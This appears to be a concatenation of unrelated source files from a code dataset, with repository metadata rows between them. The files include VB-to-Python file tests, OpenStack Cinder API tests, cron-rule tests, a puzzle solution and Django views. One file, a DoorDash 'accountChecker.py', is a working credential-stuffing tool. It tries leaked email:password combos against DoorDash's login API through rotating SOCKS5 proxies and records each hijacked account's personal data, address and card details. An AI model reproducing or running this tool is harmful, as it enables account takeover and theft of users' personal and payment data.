        stderr_sink = ThreadedWrapperHandler(stderr_sink)
    return NestedSetup([
        NullHandler(),  # catch everything else
        file_sink, stderr_sink
    ])
| 31.457627 | 76 | 0.657328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 435 | 0.234375 |
d3903637fa8b57e3aab7d4a1d3f9885bab2aabda | 34 | py | Python | build/lib/abp/adaptives/dqn/__init__.py | LinearZoetrope/abp | 2459c1b4d77606c1d70715ce8378d738ba102f37 | [
"MIT"
] | null | null | null | build/lib/abp/adaptives/dqn/__init__.py | LinearZoetrope/abp | 2459c1b4d77606c1d70715ce8378d738ba102f37 | [
"MIT"
] | 1 | 2018-10-17T03:28:08.000Z | 2018-10-17T03:28:08.000Z | build/lib/abp/adaptives/dqn/__init__.py | Zaerei/abp | 2459c1b4d77606c1d70715ce8378d738ba102f37 | [
"MIT"
] | null | null | null | from .adaptive import DQNAdaptive
| 17 | 33 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d391cc09726af2cc48341fbff68008cd2eedea8a | 8,451 | py | Python | test/testfiles.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 2 | 2015-12-01T10:52:36.000Z | 2021-04-20T05:15:01.000Z | test/testfiles.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 4 | 2016-07-18T18:28:24.000Z | 2016-07-19T08:30:14.000Z | test/testfiles.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 3 | 2015-07-15T21:08:19.000Z | 2021-02-25T09:39:12.000Z | from testframework import *
import os
import vb2py.utils
PATH = vb2py.utils.rootPath()
# << File tests >> (1 of 14)
# Open with Input
tests.append((r"""
Open "%s" For Input As #3
Input #3, a
Input #3, b
Input #3, c, d, e
Input #3, f, g
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"), {'a' : 'Can you hear me now?',
'b' : 'Can you still hear me now?',
'c' : 10, 'd' : 20, 'e' : 30,
'f' : 5, 'g' : "hello",
}))
# Open with Line Input
tests.append((r"""
Open "%s/test/testread.txt" For Input As #3
Line Input #3, a
Line Input #3, b
Line Input #3, c
Line Input #3, d
Close #3
""" % PATH, {'a' : 'Can you hear me now?',
'b' : 'Can you still hear me now?',
'c' : '10, 20, 30',
'd' : '5, "hello"',
}))
# Open and using Input() to get numbers of characters
tests.append((r"""
Open "%s/test/testread.txt" For Input As #3
a = Input(3, #3)
b = Input(1, #3)
c = Input(3, #3)
Close #3
""" % PATH, {'a' : 'Can',
'b' : ' ',
'c' : 'you',
}))
# Bug #810964 Input with indexed variable fails
tests.append((r"""
Open "%s/test/testread.txt" For Input As #3
Dim _a(3) As String
Input #3, _a(1), _a(2), _a(3)
Close #3
a = _a(1)
b = _a(2)
c = _a(3)
""" % PATH, {'a' : 'Can you hear me now?',
'b' : 'Can you still hear me now?',
'c' : 10,
}))
# Open with Random access
tests.append((r"""
Open "%s" For Random As #3 Len = 2
' !!!!Dont expect this to work!!!!
Input #3, a
Input #3, b
Input #3, c, d, e
Input #3, f, g
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"), {'a' : 'This wont work!!!!'}))
# << File tests >> (2 of 14)
# Open with print
tests.append((r"""
Open "%s/test/testwrite.txt" For Output As #3
Print #3, 10
Print #3, 20, 30
Print #3, 40, 50
Print #3, "hello"
Close #3
Open "%s/test/testwrite.txt" For Input As #3
Input #3, a, b, c, d, f
Line Input #3, e
""" % (PATH, PATH), {'a' : 10, 'b' : 20,
'c' : 30, 'd' : 40, 'e' : 'hello',
'f' : 50,
}))
# Open with print but no cr
tests.append((r"""
Open "%s/test/testwrite.txt" For Output As #3
Print #3, 10;
Print #3, 20, 30;
Print #3, 40, "hello", 50;
Close #3
Open "%s/test/testwrite.txt" For Input As #3
Line Input #3, a
""" % (PATH, PATH), {'a' : "1020\t3040\thello\t50"}
))
# Bare print with no channel number (Bug #805866 - used to fail during render)
tests.append(("Print 10", {}))
# << File tests >> (3 of 14)
# Open with Input
tests.append((r"""
Close
_a = FreeFile
Open "%s" For Input As FreeFile
Open "%s" For Output As FreeFile
_b = FreeFile
Close
_c = FreeFile
a = _a = _b
b = _a = _c
c = _b = _c
d = CStr(_a) & CStr(_b) & CStr(_c)
""" % (vb2py.utils.relativePath("test/testread.txt"),
vb2py.utils.relativePath("test/testwrite.txt")),
{'a':0, 'b':1, 'c':0, 'd': '131',
}))
# Using Reset instead of Close
tests.append((r"""
Reset
_a = FreeFile
Open "%s" For Input As FreeFile
Open "%s" For Output As FreeFile
_b = FreeFile
Reset
_c = FreeFile
a = _a = _b
b = _a = _c
c = _b = _c
d = CStr(_a) & CStr(_b) & CStr(_c)
""" % (vb2py.utils.relativePath("test/testread.txt"),
vb2py.utils.relativePath("test/testwrite.txt")),
{'a':0, 'b':1, 'c':0, 'd': '131',
}))
# Bug #810968 Close #1, #2 ' fails to parse
tests.append((r"""
Open "%s" For Input As #3
Open "%s" For Output As #4
Close #3, #4
Input #3, a
""" % (vb2py.utils.relativePath("test/testread.txt"),
vb2py.utils.relativePath("test/testwrite.txt")),
{'FAIL' : 'yes',
}))
# << File tests >> (4 of 14)
# Seek as a way of moving around in a file
tests.append((r"""
Open "%s" For Input As #3
Input #3, a
Seek #3, 1
Input #3, b
Seek #3, 5
Input #3, c
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 'Can you hear me now?',
'b' : 'Can you hear me now?',
'c' : 'you hear me now?',
}))
# Seek as a property of the file
tests.append((r"""
Open "%s" For Input As #3
a = Seek(3)
Input #3, _a
b = Seek(3)
Seek #3, 5
c = Seek(3)
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 1,
'b' : 23,
'c' : 5,
}))
# << File tests >> (5 of 14)
# Dir
tests.append((r"""
a = Dir("test/test*.txt")
b = Dir()
c = Dir()
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# Dir$
tests.append((r"""
a = Dir$("test/test*.txt")
b = Dir$()
c = Dir$()
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# Dir no parenthesis
tests.append((r"""
a = Dir("test/test*.txt")
b = Dir
c = Dir
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# Dir$ no parenthesis
tests.append((r"""
a = Dir$("test/test*.txt")
b = Dir$
c = Dir$
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# << File tests >> (6 of 14)
# Dir
tests.append((r"""
_a = FreeFile
Open "__f1.txt" For Output As #_a
_b = FreeFile
Open "__f2.txt" For Output As #_b
Close #_b
_c = FreeFile
Close #_a
_d = FreeFile
da = _b-_a
db = _c-_a
dd = _d-_a
""",
{
'da' : 1,
'db' : 1,
'dd' : 0,
}))
# << File tests >> (7 of 14)
# Dir
tests.append((r"""
ChDir "%s"
Open "_test1.txt" For Output As #3
Print #3, "in testdir"
Close #3
ChDir "%s"
Open "_test1.txt" For Output As #3
Print #3, "not in testdir"
Close #3
ChDir "%s"
Open "_test1.txt" For Input As #3
Input #3, a
Close #3
ChDir "%s"
Open "_test1.txt" For Input As #3
Input #3, b
Close #3
""" % (vb2py.utils.relativePath("test/testdir"),
vb2py.utils.relativePath("test"),
vb2py.utils.relativePath("test/testdir"),
vb2py.utils.relativePath("test")),
{
'a' : 'in testdir',
'b' : 'not in testdir',
}))
# << File tests >> (8 of 14)
# Dir
tests.append((r"""
Open "_test1.txt" For Output As #3
Print #3, "made file"
Close #3
Kill "_test1.txt"
a = Dir("_test1.txt")
""",
{
'a' : '',
}))
# << File tests >> (9 of 14)
try:
for name in os.listdir(vb2py.utils.relativePath("test/mytest2")):
os.remove(os.path.join(vb2py.utils.relativePath("test/mytest2"), name))
except OSError:
pass
try:
os.rmdir(vb2py.utils.relativePath("test/mytest2"))
except OSError, err:
pass
# Dir
tests.append((r"""
MkDir "%s"
Open "%s\test1.txt" For Output As #3
Print #3, "made file"
Close #3
a = 1
""" % (vb2py.utils.relativePath("test/mytest2"),
vb2py.utils.relativePath("test/mytest2")),
{
'a' : 1,
}))
# << File tests >> (10 of 14)
try:
for name in os.listdir(vb2py.utils.relativePath("test/mytestdir")):
os.remove(os.path.join(vb2py.utils.relativePath("test/mytestdir"), name))
except OSError:
pass
try:
os.rmdir(vb2py.utils.relativePath("test/mytestdir"))
except OSError:
pass
# Dir
tests.append((r"""
MkDir "%s"
RmDir "%s"
a = 0
""" % (vb2py.utils.relativePath("test/mytestdir"),
vb2py.utils.relativePath("test/mytestdir")),
{
'a' : os.path.isdir(vb2py.utils.relativePath("test/mytestdir")),
}))
# << File tests >> (11 of 14)
try:
os.remove(os.path.join(vb2py.utils.relativePath("test"), "knewname.txt"))
except OSError:
pass
# Dir
tests.append((r"""
_path = "%s"
Open _path & "\origname.txt" For Output As #3
Close #3
a = Dir(_path & "\origname.txt")
Name _path & "\origname.txt" As _path & "\knewname.txt"
b = Dir(_path & "\origname.txt")
c = Dir(_path & "\knewname.txt")
""" % (vb2py.utils.relativePath("test")),
{
'a' : "origname.txt",
'b' : "",
'c' : "knewname.txt",
}))
# << File tests >> (12 of 14)
try:
os.remove(os.path.join(vb2py.utils.relativePath("test"), "finalcopy.txt"))
except OSError:
pass
# Dir
tests.append((r"""
_path = "%s"
Open _path & "\origcopy.txt" For Output As #3
Print #3, "original"
Close #3
a = Dir(_path & "\origcopy.txt")
b = Dir(_path & "\finalcopy.txt")
FileCopy _path & "\origcopy.txt", _path & "\finalcopy.txt"
c = Dir(_path & "\origcopy.txt")
d = Dir(_path & "\finalcopy.txt")
""" % (vb2py.utils.relativePath("test")),
{
'a' : "origcopy.txt",
'b' : "",
'c' : "origcopy.txt",
'd' : "finalcopy.txt",
}))
# << File tests >> (13 of 14)
# Input as a function to get a certain number of characters
tests.append((r"""
Open "%s" For Input As #3
a = Input(3, #3)
b = Input(4, #3)
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 'Can',
'b' : ' you',
}))
# << File tests >> (14 of 14)
# Input as a function to get a certain number of characters
tests.append((r"""
Open "%s" For Input As #3
While Not EOF(#3)
Input #3, a
End While
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 'hello',
}))
# -- end -- << File tests >>
#< < Small File tests >>
import vb2py.vbparser
vb2py.vbparser.log.setLevel(0) # Don't print all logging stuff
TestClass = addTestsTo(BasicTest, tests)
if __name__ == "__main__":
main()
| 20.121429 | 83 | 0.595196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,750 | 0.680393 |
d3921bbf727327b6abcb686de351663bb6fe7b42 | 181 | py | Python | Reinforcement_Learning/gym-environments/setup.py | SpencerPao/ComputerVision | 807ce1a1bb651a7a2248f074ab3caab95ea56a96 | [
"MIT"
] | 1 | 2021-11-22T21:52:35.000Z | 2021-11-22T21:52:35.000Z | Reinforcement_Learning/gym-environments/setup.py | SpencerPao/ComputerVision | 807ce1a1bb651a7a2248f074ab3caab95ea56a96 | [
"MIT"
] | 2 | 2021-11-23T02:02:56.000Z | 2021-12-19T01:04:38.000Z | Reinforcement_Learning/gym-environments/setup.py | SpencerPao/ComputerVision | 807ce1a1bb651a7a2248f074ab3caab95ea56a96 | [
"MIT"
] | null | null | null | from setuptools import setup
# Package metadata for the gym_dinorun environment.
setup(name='gym_dinorun',
      version='0.1',
      # gym environment API plus browser automation and imaging dependencies
      install_requires=['gym', 'selenium', 'numpy', 'pillow', 'pyvirtualdisplay', 'matplotlib']
      )
| 25.857143 | 95 | 0.651934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.430939 |
d395a54f3004f10283773579ea5b4ac7ad799fb1 | 2,234 | py | Python | openstack_dashboard/test/api_tests/cinder_tests.py | dreamhost/horizon | 55569d540e6c1a6957d5127f9bae6a699ed60823 | [
"Apache-2.0"
] | 3 | 2017-02-13T15:11:01.000Z | 2021-07-28T08:28:09.000Z | openstack_dashboard/test/api_tests/cinder_tests.py | yongquanf/horizon | 9aad7fd6f66588fed7c27b720642e47a4a12854b | [
"Apache-2.0"
] | 10 | 2015-02-19T20:27:04.000Z | 2017-05-15T15:04:32.000Z | openstack_dashboard/test/api_tests/cinder_tests.py | yongquanf/horizon | 9aad7fd6f66588fed7c27b720642e47a4a12854b | [
"Apache-2.0"
] | 4 | 2015-05-05T08:17:28.000Z | 2020-02-05T10:47:06.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
class CinderApiTests(test.APITestCase):
    """Unit tests for the Cinder API wrappers, using mox stubs."""

    def test_volume_list(self):
        # Listing volumes must pass search_opts straight through to the client.
        search_opts = {'all_tenants': 1}
        volumes = self.volumes.list()
        cinderclient = self.stub_cinderclient()
        cinderclient.volumes = self.mox.CreateMockAnything()
        cinderclient.volumes.list(search_opts=search_opts,).AndReturn(volumes)
        self.mox.ReplayAll()
        # No assertions are necessary. Verification is handled by mox.
        api.cinder.volume_list(self.request, search_opts=search_opts)

    def test_volume_snapshot_list(self):
        volume_snapshots = self.volume_snapshots.list()
        cinderclient = self.stub_cinderclient()
        cinderclient.volume_snapshots = self.mox.CreateMockAnything()
        cinderclient.volume_snapshots.list().AndReturn(volume_snapshots)
        self.mox.ReplayAll()
        api.cinder.volume_snapshot_list(self.request)

    def test_volume_snapshot_list_no_volume_configured(self):
        # remove volume from service catalog
        catalog = self.service_catalog
        for service in catalog:
            if service["type"] == "volume":
                self.service_catalog.remove(service)
        # NOTE(review): removing from the list being iterated skips the element
        # after each match; this is only safe if at most one "volume" service
        # entry exists — confirm against the test fixtures.
        volume_snapshots = self.volume_snapshots.list()
        cinderclient = self.stub_cinderclient()
        cinderclient.volume_snapshots = self.mox.CreateMockAnything()
        cinderclient.volume_snapshots.list().AndReturn(volume_snapshots)
        self.mox.ReplayAll()
        api.cinder.volume_snapshot_list(self.request)
| 39.192982 | 78 | 0.715309 | 1,490 | 0.666965 | 0 | 0 | 0 | 0 | 0 | 0 | 760 | 0.340197 |
d3963f0cda7e231690d35ea142f4ffd430047c44 | 144 | py | Python | admin-portal/queues/apps.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | admin-portal/queues/apps.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | admin-portal/queues/apps.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | 1 | 2021-09-19T10:58:17.000Z | 2021-09-19T10:58:17.000Z | from django.apps import AppConfig
class QueuesConfig(AppConfig):
    # Django application configuration for the "queues" app.
    default_auto_field = "django.db.models.BigAutoField"  # default PK type for app models
    name = "queues"
| 20.571429 | 56 | 0.756944 | 107 | 0.743056 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.270833 |
d396697591d214281a9fa0a4c6107036bc957349 | 964 | py | Python | tests/test_cron.py | acuros/noopy | aa128466068bfcdcd4be3aa16c1bdd48fd9e5a23 | [
"MIT"
] | 11 | 2016-01-16T06:00:39.000Z | 2016-05-24T02:25:58.000Z | tests/test_cron.py | acuros/noopy | aa128466068bfcdcd4be3aa16c1bdd48fd9e5a23 | [
"MIT"
] | 4 | 2016-01-23T07:00:47.000Z | 2016-05-09T02:49:26.000Z | tests/test_cron.py | acuros/noopy | aa128466068bfcdcd4be3aa16c1bdd48fd9e5a23 | [
"MIT"
] | null | null | null | import pytest
from noopy.cron.rule import RateEventRule, BaseEventRule, TimeEventRule
from noopy.decorators import cron
@pytest.fixture
def rate_5_mins_rule():
    # Rate rule with value=5; unit left to RateEventRule's default (presumably
    # minutes — the test below expects 'rate(5 minutes)').
    return RateEventRule('5MinsRateRule', value=5)
@pytest.fixture
def time_5pm_rule():
    # Cron-style rule for hour 17 (5 pm): the six-field expression '* 17 * * * *'.
    return TimeEventRule('5pmRule', '* 17 * * * *')
@pytest.fixture
def cronjob():
    # Minimal callable with the (event, context) handler signature.
    return lambda event, context: dict(foo='bar')
def test_rate_rule(rate_5_mins_rule):
    # Constructing a rule alone must not register it globally.
    assert len(BaseEventRule.rules) == 0
    assert rate_5_mins_rule.expression == 'rate(5 minutes)'
def test_time_rule(time_5pm_rule):
    # Constructing a rule alone must not register it globally.
    assert len(BaseEventRule.rules) == 0
    assert time_5pm_rule.expression == 'cron(* 17 * * * *)'
def test_cron_decorator(cronjob):
    # Applying the cron decorator registers the rule and attaches the function.
    rule = RateEventRule("RateCron", 1, RateEventRule.UNIT_HOURS)
    cron(rule)(cronjob)
    assert len(BaseEventRule.rules) == 1
    # NOTE(review): dict.values() is not indexable on Python 3; either this
    # suite targets Python 2 or `rules` is not a plain dict — confirm.
    assert len(BaseEventRule.rules.values()[0].functions) == 1
    assert BaseEventRule.rules.values()[0].functions[0] == cronjob
| 25.368421 | 71 | 0.724066 | 0 | 0 | 0 | 0 | 258 | 0.267635 | 0 | 0 | 90 | 0.093361 |
d3969c2344d1fd1927504d6b7d57dcf4c82c4a97 | 5,420 | py | Python | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 5 | 2021-02-24T23:37:52.000Z | 2021-08-18T06:39:30.000Z | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | null | null | null | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 1 | 2021-03-26T06:21:20.000Z | 2021-03-26T06:21:20.000Z | import requests
import random
import json
from multiprocessing import Pool # Multi-Threading
from multiprocessing import freeze_support # Windows Support
requests.packages.urllib3.disable_warnings()  # silence TLS warnings (verification disabled)
# One credential per line ("email:password") and one proxy per line
# ("ip:port:username:password") — see the split(':') calls in checkAccount.
accounts = [line.rstrip('\n') for line in open("combo.txt", 'r')]
proxies = [line.rstrip('\n') for line in open("proxies.txt", 'r')]
# NOTE(review): the two file handles above are never closed explicitly.
workingJson = []  # shared accumulator list for results
headers = {
    'Content-Type': 'application/json',
}
def generateSocks5ProxyUrl(ip, port, username=None, password=None):
    """Build a requests-style proxies dict for a SOCKS5 proxy.

    Credentials are embedded in the URL only when both username and
    password are truthy; the same URL is used for http and https.
    """
    if username and password:
        url = f"socks5://{username}:{password}@{ip}:{port}"
    else:
        url = f"socks5://{ip}:{port}"
    return {'http': url, 'https': url}
def generateLoginPayload(email, password):
    """Return the JSON-serializable body for the web_login endpoint."""
    payload = dict(email=email, password=password)
    return payload
def createOutputString(email, password, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience):
    """Format a one-line, pipe-separated summary of a checked account.

    Falsy fields are omitted. The original hand-trimmed the trailing
    separator with ``[:-2]``, which left a stray trailing space on most
    outputs; building the segments as a list and joining fixes that.
    """
    parts = [f"{email}:{password}"]
    if first_name and last_name:
        parts.append(f"Name: {first_name} {last_name}")
    if phone_number:
        parts.append(f"Phone Number: {phone_number}")
    if account_credits:
        parts.append(f"Account Credits: {account_credits}")
    if printable_address:
        parts.append(f"Default Address: {printable_address}")
    if default_card_type and default_card_exp_month and default_card_exp_year and default_card_last4:
        parts.append(f"Default Card: {default_card_type}*{default_card_last4} Expires {default_card_exp_month}/{default_card_exp_year}")
    if show_alcohol_experience:
        parts.append(f"Alcohol Allowed: {show_alcohol_experience}")
    return " | ".join(parts) + "\n"
def checkAccount(account):
    """Attempt a DoorDash web login for one "email:password" combo line.

    Picks a random SOCKS5 proxy, POSTs the credentials, and on a successful
    login appends a human-readable summary to out.txt and the raw response
    JSON to data.json. Runs inside a multiprocessing Pool worker (see main).
    """
    global proxies
    # Proxy lines are expected as "ip:port:username:password".
    proxy = random.choice(proxies)
    ip, port, username, password = proxy.split(':')
    userEmail, userPassword = account.split(':')
    proxyUrl = generateSocks5ProxyUrl(ip, port, username, password)
    try:
        response = requests.post('https://api.doordash.com/v2/auth/web_login/', proxies=proxyUrl, headers=headers, data=json.dumps(generateLoginPayload(userEmail, userPassword)))
        if (response.status_code == 403 or response.status_code == 406 or 'Access Denied' in response.text):
            # Proxy blocked by the CDN; keep it in the pool and just report.
            print(f"[Cloudflare Banned Proxy] {proxy}")
        elif ('Login banned due to violation of terms of service' in response.text):
            print(f"[Banned Proxy] {proxy}")
            # NOTE(review): this mutates only this worker process's copy of
            # the module-level list; Pool workers do not share globals.
            proxies.remove(proxy)
        elif ('id' in response.text):
            # Convert response to JSON
            userData = response.json()
            # Inject the user's password into the response object
            # (so it is preserved in the data.json dump below)
            userData['password'] = userPassword
            # User's Personal Info ("or None" collapses empty strings to None)
            first_name = userData['first_name'] or None
            last_name = userData['last_name'] or None
            phone_number = userData['phone_number'] or None
            # Account Credits
            account_credits = userData['account_credits'] or None
            # Default Address Info
            default_address = userData['default_address'] or None
            if default_address:
                printable_address = default_address['printable_address'] or None
            else:
                printable_address = None
            # Default Card Info
            default_card = userData['default_card'] or None
            if default_card:
                default_card_type = default_card['type'] or None
                default_card_exp_month = default_card['exp_month'] or None
                default_card_exp_year = default_card['exp_year'] or None
                default_card_last4 = default_card['last4'] or None
            else:
                default_card_type = None
                default_card_exp_month = None
                default_card_exp_year = None
                default_card_last4 = None
            # Can recieve alcohol
            show_alcohol_experience = userData['show_alcohol_experience'] or None
            # Combine into one string
            outputString = createOutputString(userEmail, userPassword, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience)
            print(f"[Good Account] {outputString}")
            # Append the summary line to the working-accounts text file.
            try:
                with open('out.txt', 'a') as f:
                    f.write(outputString)
                    f.close()
            except:
                print('[Write Fail] Failed to write account information to working file')
            # Rewrite data.json with every JSON payload seen by this worker.
            try:
                workingJson.append(response.json())
                with open('data.json', 'w') as outfile:
                    json.dump(workingJson, outfile)
                    outfile.close()
            except:
                print('[Write Fail] Failed to write account information to JSON')
    except Exception as e:
        print(f'[Checking Failed] {e}')
def main():
    """Ask for a worker count, then fan the account list out over a Pool."""
    thread_count = input("How many threads would you like to use? ")
    freeze_support()
    worker_pool = Pool(int(thread_count))
    worker_pool.map(checkAccount, accounts)
    worker_pool.close()
    worker_pool.join()
if __name__ == "__main__":
    # Entry point; the guard is required when spawning multiprocessing workers.
    main()
d3969f3939b66414fab78446df9b5e37a00ed217 | 1,097 | py | Python | Day1/solution.py | pbragapassarelli/Advent-of-Code-2020 | 6524449c0832e87aa6a94e67162378d315ec2386 | [
"MIT"
] | null | null | null | Day1/solution.py | pbragapassarelli/Advent-of-Code-2020 | 6524449c0832e87aa6a94e67162378d315ec2386 | [
"MIT"
] | null | null | null | Day1/solution.py | pbragapassarelli/Advent-of-Code-2020 | 6524449c0832e87aa6a94e67162378d315ec2386 | [
"MIT"
] | null | null | null | import numpy as np
# Path to the puzzle input file: one integer per line.
data_file = 'input.txt'
def parse_input(input_data_file):
    """Read the puzzle input and return one int per non-blank line.

    The original computed ``item_count = len(lines) - 1``, which assumed a
    trailing newline and silently dropped the last entry otherwise; it also
    crashed on blank interior lines. This version parses every non-blank line.
    """
    with open(input_data_file, 'r') as f:
        return [int(line) for line in f.read().splitlines() if line.strip()]
def solver1(items):
    """Return the product of the two distinct entries summing to 2020.

    Uses a complement set for O(n) instead of the original O(n^2) double
    loop. Returns None when no pair exists (the original fell through and
    returned the product of the last pair examined).
    """
    seen = set()
    for value in items:
        complement = 2020 - value
        if complement in seen:
            return value * complement
        seen.add(value)
    return None
def solver2(items):
    """Return the product of the three distinct entries summing to 2020.

    For each first element, reduces to the two-sum problem with a
    complement set: O(n^2) instead of the original O(n^3) triple loop.
    Returns None when no triple exists (the original fell through and
    returned the product of the last triple examined).
    """
    for i, first in enumerate(items):
        target = 2020 - first
        seen = set()
        for second in items[i + 1:]:
            third = target - second
            if third in seen:
                return first * second * third
            seen.add(second)
    return None
# Module-level driver: parse the input, solve both parts, print the answers.
items = parse_input(data_file)
solution1 = solver1(items)
solution2 = solver2(items)
print(f'The 2 items that sum to 2020 multiplied together is equal to {solution1}.')
print(f'The 3 items that sum to 2020 multiplied together is equal to {solution2}.')
d3970e3b64f228131e6989e131e2293b5c3f4cea | 2,206 | py | Python | analysis/log_analysis/check_util.py | leozz37/makani | c94d5c2b600b98002f932e80a313a06b9285cc1b | [
"Apache-2.0"
] | 1,178 | 2020-09-10T17:15:42.000Z | 2022-03-31T14:59:35.000Z | analysis/log_analysis/check_util.py | leozz37/makani | c94d5c2b600b98002f932e80a313a06b9285cc1b | [
"Apache-2.0"
] | 1 | 2020-05-22T05:22:35.000Z | 2020-05-22T05:22:35.000Z | analysis/log_analysis/check_util.py | leozz37/makani | c94d5c2b600b98002f932e80a313a06b9285cc1b | [
"Apache-2.0"
] | 107 | 2020-09-10T17:29:30.000Z | 2022-03-18T09:00:14.000Z | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for checks."""
from makani.analysis.checks import base_check
from makani.lib.python import import_util
# TODO: Move this to //analysis/checks/base_check.py
def LoadListOfChecks(path_to_checks):
  """Instantiate a ListOfChecks class given its import path.

  Args:
    path_to_checks: A string specifying the location of the checks.
        E.g. makani.analysis.my_checks.MyCheck.

  Returns:
    The ListOfChecks object, constructed for log analysis.
  """
  checks_class = import_util.ImportClass(path_to_checks)
  return checks_class(for_log=True)
def LoadJsonCheck(path_to_check, parameters_json):
  r"""Instantiate a Check class from its import path and JSON parameters.

  Args:
    path_to_check: A string specifying the location of the check.
        E.g. makani.analysis.my_checks.MyCheck
    parameters_json: A JSON serialized string of the parameters needed to
        instantiate the class.
        E.g. "{\"for_log\": true, \"warning_ranges\": {\"ranges\": [0, 180]},
        \"normal_ranges\": {\"ranges\": [80, 150]}}"

  Returns:
    The Check object.
  """
  check_class = import_util.ImportClass(path_to_check)
  init_params = base_check.ParseCheckSpecs(parameters_json)
  return check_class(**init_params)
def LoadCheck(path_to_check, params):
  """Load a single Check object given the path to its class.

  Args:
    path_to_check: A string specifying the location of the check.
        E.g. makani.analysis.my_checks.MyCheck.
    params: A dict of keyword arguments passed to the check's constructor.

  Returns:
    The CheckItem object.
  """
  cls = import_util.ImportClass(path_to_check)
  return cls(**params)
| 32.441176 | 77 | 0.729828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,681 | 0.762013 |
d3979bc7f150cc1b30133b1b6f53958cab7914a1 | 1,732 | py | Python | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
"""
__create_time__ = '13-10-18'
__author__ = 'Madre'
"""
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
from resource.models import Resource, Topic
class ResourceListView(ListView):
    """List every Resource; the template also receives ``topic_list``."""
    model = Resource
    template_name = "resource_list.html"
    context_object_name = 'resource_list'

    def get_context_data(self, **kwargs):
        ctx = super(ResourceListView, self).get_context_data(**kwargs)
        ctx["topic_list"] = Topic.objects.all()
        return ctx
class ResourceDetailView(DetailView):
    """Detail page for a single Resource looked up by primary key.

    The template also receives ``topic_list`` (all topics).
    """
    context_object_name = 'resource'
    model = Resource
    template_name = "resource_detail.html"

    def get_object(self, queryset=None):
        # Accept the optional ``queryset`` argument so the override matches
        # Django's SingleObjectMixin.get_object(queryset=None) signature.
        resource = get_object_or_404(Resource, pk=self.kwargs['pk'])
        return resource

    def get_context_data(self, **kwargs):
        context = super(ResourceDetailView, self).get_context_data(**kwargs)
        context["topic_list"] = Topic.objects.all()
        return context
class DocsResourceView(ListView):
    """List only the resources whose resource_type slug is "docs"."""
    context_object_name = 'resource_list'
    template_name = "resource_docs.html"
    model = Resource

    def get_queryset(self):
        docs_qs = Resource.objects.filter(resource_type__slug="docs")
        return docs_qs
class TopicDetailView(DetailView):
    """Detail page for a single Topic looked up by primary key.

    The template also receives ``topic_list`` (all topics).
    """
    context_object_name = 'topic'
    model = Topic
    template_name = "topic_detail.html"

    def get_object(self, queryset=None):
        # Accept the optional ``queryset`` argument so the override matches
        # Django's SingleObjectMixin.get_object(queryset=None) signature.
        topic = get_object_or_404(Topic, pk=self.kwargs['pk'])
        return topic

    def get_context_data(self, **kwargs):
        context = super(TopicDetailView, self).get_context_data(**kwargs)
        context["topic_list"] = Topic.objects.all()
